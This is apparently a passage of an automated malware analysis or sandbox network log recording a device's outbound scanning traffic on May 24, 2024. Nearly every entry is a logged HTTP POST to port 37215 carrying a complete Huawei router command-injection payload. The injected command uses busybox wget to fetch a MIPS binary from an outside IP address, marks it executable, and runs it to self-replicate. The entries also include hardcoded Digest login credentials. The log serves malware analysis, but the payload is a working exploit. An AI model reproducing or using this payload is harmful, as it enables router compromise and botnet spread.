6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  250192.168.2.1339162157.22.22.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079745054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  251192.168.2.133576641.128.103.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079761028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  252192.168.2.1343962197.23.100.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079761028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  253192.168.2.1335140197.203.5.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079804897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  254192.168.2.133557041.25.98.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079818010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  255192.168.2.134253814.113.246.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079818010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  256192.168.2.1340380157.227.187.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079818010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  257192.168.2.133281841.237.176.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079843998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  258192.168.2.134254241.105.70.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079850912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  259192.168.2.1334314151.225.117.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.079879999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  260192.168.2.1349276197.8.45.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.080862045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
